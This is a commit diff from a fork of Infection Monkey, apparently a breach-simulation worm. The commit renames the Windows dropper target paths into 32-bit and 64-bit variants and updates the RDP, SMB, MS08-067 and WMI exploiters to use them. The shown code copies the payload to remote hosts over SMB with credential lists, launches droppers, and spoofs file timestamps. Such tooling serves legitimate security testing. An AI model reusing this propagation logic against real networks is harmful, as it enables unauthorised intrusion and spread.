p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Monkey now uses different names for 32,64bit on windows. 

No need to use dropper or rename moneky
This commit is contained in:
Itay Mizeretz 2018-03-04 17:05:43 +02:00
parent 72fd930499
commit ee23703bfa
8 changed files with 34 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
infection_monkey/config.py
View File

@ -9,6 +9,7 @@ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter
SambaCryExploiter, ElasticGroovyExploiter SambaCryExploiter, ElasticGroovyExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger
from network.range import FixedRange from network.range import FixedRange
from windows_upgrader import WindowsUpgrader
__author__ = 'itamar' __author__ = 'itamar'
@ -115,14 +116,12 @@ class Configuration(object):
dropper_set_date = True dropper_set_date = True
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll" dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
dropper_date_reference_path_linux = '/bin/sh' dropper_date_reference_path_linux = '/bin/sh'
dropper_target_path = r"C:\Windows\monkey.exe" dropper_target_path_win_32 = r"C:\Windows\monkey32.exe"
dropper_target_path_win_64 = r"C:\Windows\monkey64.exe"
dropper_target_path_linux = '/tmp/monkey' dropper_target_path_linux = '/tmp/monkey'
########################### def get_dropper_target_path_win(self):
# Windows upgrader config return self.dropper_target_path_win_64 if WindowsUpgrader.is_64bit_python() else self.dropper_target_path_win_32
###########################
windows_upgrader_temp_path = r"C:\Windows\monkey64.exe"
########################### ###########################
# Kill file # Kill file

4
infection_monkey/example.conf
View File

@ -22,8 +22,8 @@
"dropper_log_path_windows": "%temp%\\~df1562.tmp", "dropper_log_path_windows": "%temp%\\~df1562.tmp",
"dropper_log_path_linux": "/tmp/user-1562", "dropper_log_path_linux": "/tmp/user-1562",
"dropper_set_date": true, "dropper_set_date": true,
"dropper_target_path": "C:\\Windows\\monkey.exe", "dropper_target_path_win_32": "C:\\Windows\\monkey32.exe",
"windows_upgrader_temp_path": "C:\\Windows\\monkey64.exe", "dropper_target_path_win_64": "C:\\Windows\\monkey64.exe",
"dropper_target_path_linux": "/tmp/monkey", "dropper_target_path_linux": "/tmp/monkey",

4
infection_monkey/exploit/rdpgrinder.py
View File

@ -278,11 +278,11 @@ class RdpExploiter(HostExploiter):
if self._config.rdp_use_vbs_download: if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % { command = RDP_CMDLINE_HTTP_VBS % {
'monkey_path': self._config.dropper_target_path, 'monkey_path': self._config.get_dropper_target_path_win(),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
else: else:
command = RDP_CMDLINE_HTTP_BITS % { command = RDP_CMDLINE_HTTP_BITS % {
'monkey_path': self._config.dropper_target_path, 'monkey_path': self._config.get_dropper_target_path_win(),
'http_path': http_path, 'parameters': cmdline} 'http_path': http_path, 'parameters': cmdline}
user_password_pairs = self._config.get_exploit_user_password_pairs() user_password_pairs = self._config.get_exploit_user_password_pairs()

6
infection_monkey/exploit/smbexec.py
View File

@ -57,7 +57,7 @@ class SmbExploiter(HostExploiter):
# copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
user, user,
password, password,
lm_hash, lm_hash,
@ -85,9 +85,9 @@ class SmbExploiter(HostExploiter):
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path.lower(): if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
else: else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)

8
infection_monkey/exploit/win_ms08_067.py
View File

@ -214,7 +214,7 @@ class Ms08_067_Exploiter(HostExploiter):
# copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
self._config.ms08_067_remote_user_add, self._config.ms08_067_remote_user_add,
self._config.ms08_067_remote_user_pass) self._config.ms08_067_remote_user_pass)
@ -223,7 +223,7 @@ class Ms08_067_Exploiter(HostExploiter):
for password in self._config.exploit_password_list: for password in self._config.exploit_password_list:
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
"Administrator", "Administrator",
password) password)
if remote_full_path: if remote_full_path:
@ -233,9 +233,9 @@ class Ms08_067_Exploiter(HostExploiter):
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path.lower(): if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)

6
infection_monkey/exploit/wmiexec.py
View File

@ -77,7 +77,7 @@ class WmiExploiter(HostExploiter):
# copy the file remotely using SMB # copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host, remote_full_path = SmbTools.copy_file(self.host,
src_path, src_path,
self._config.dropper_target_path, self._config.get_dropper_target_path_win(),
user, user,
password, password,
lm_hash, lm_hash,
@ -88,9 +88,9 @@ class WmiExploiter(HostExploiter):
wmi_connection.close() wmi_connection.close()
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path.lower(): elif remote_full_path.lower() != self._config.get_dropper_target_path_win().lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win())
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1) build_monkey_commandline(self.host, get_monkey_depth() - 1)

10
infection_monkey/windows_upgrader.py
View File

@ -10,7 +10,7 @@ import monkeyfs
from config import WormConfiguration from config import WormConfiguration
from control import ControlClient from control import ControlClient
from exploit.tools import build_monkey_commandline_explicitly from exploit.tools import build_monkey_commandline_explicitly
from model import DROPPER_CMDLINE_WINDOWS from model import MONKEY_CMDLINE_WINDOWS
__author__ = 'itay.mizeretz' __author__ = 'itay.mizeretz'
@ -45,15 +45,15 @@ class WindowsUpgrader(object):
monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False) monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False)
with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file: with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file:
monkey_bin = downloaded_monkey_file.read() monkey_bin = downloaded_monkey_file.read()
with open(WormConfiguration.windows_upgrader_temp_path, 'wb') as written_monkey_file: with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file:
written_monkey_file.write(monkey_bin) written_monkey_file.write(monkey_bin)
depth = int(opts.depth) if opts.depth is not None else None depth = int(opts.depth) if opts.depth is not None else None
monkey_options = build_monkey_commandline_explicitly( monkey_options = build_monkey_commandline_explicitly(
opts.parent, opts.tunnel, opts.server, depth, WormConfiguration.dropper_target_path) opts.parent, opts.tunnel, opts.server, depth)
monkey_cmdline = DROPPER_CMDLINE_WINDOWS % { monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {
'dropper_path': WormConfiguration.windows_upgrader_temp_path} + monkey_options 'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options
monkey_process = subprocess.Popen(monkey_cmdline, shell=True, monkey_process = subprocess.Popen(monkey_cmdline, shell=True,
stdin=None, stdout=None, stderr=None, stdin=None, stdout=None, stderr=None,

21
monkey_island/cc/services/config.py
View File

@ -350,14 +350,7 @@ SCHEMA = {
"type": "integer", "type": "integer",
"default": 60, "default": 60,
"description": "Time to keep tunnel open before going down after last exploit (in seconds)" "description": "Time to keep tunnel open before going down after last exploit (in seconds)"
}, }
"windows_upgrader_temp_path": {
"title": "Temporary upgrade path for 64bit monkey on Windows",
"type": "string",
"default": "C:\\Windows\\monkey64.exe",
"description": "Determines where should the dropper place the 64 bit monkey while"
" upgrading on a Windows machine"
},
} }
}, },
"classes": { "classes": {
@ -447,10 +440,16 @@ SCHEMA = {
"default": "/tmp/monkey", "default": "/tmp/monkey",
"description": "Determines where should the dropper place the monkey on a Linux machine" "description": "Determines where should the dropper place the monkey on a Linux machine"
}, },
"dropper_target_path": { "dropper_target_path_win_32": {
"title": "Dropper target path on Windows", "title": "Dropper target path on Windows (32bit)",
"type": "string", "type": "string",
"default": "C:\\Windows\\monkey.exe", "default": "C:\\Windows\\monkey32.exe",
"description": "Determines where should the dropper place the monkey on a Windows machine"
},
"dropper_target_path_win_64": {
"title": "Dropper target path on Windows (64bit)",
"type": "string",
"default": "C:\\Windows\\monkey64.exe",
"description": "Determines where should the dropper place the monkey on a Windows machine" "description": "Determines where should the dropper place the monkey on a Windows machine"
}, },
"dropper_try_move_first": { "dropper_try_move_first": {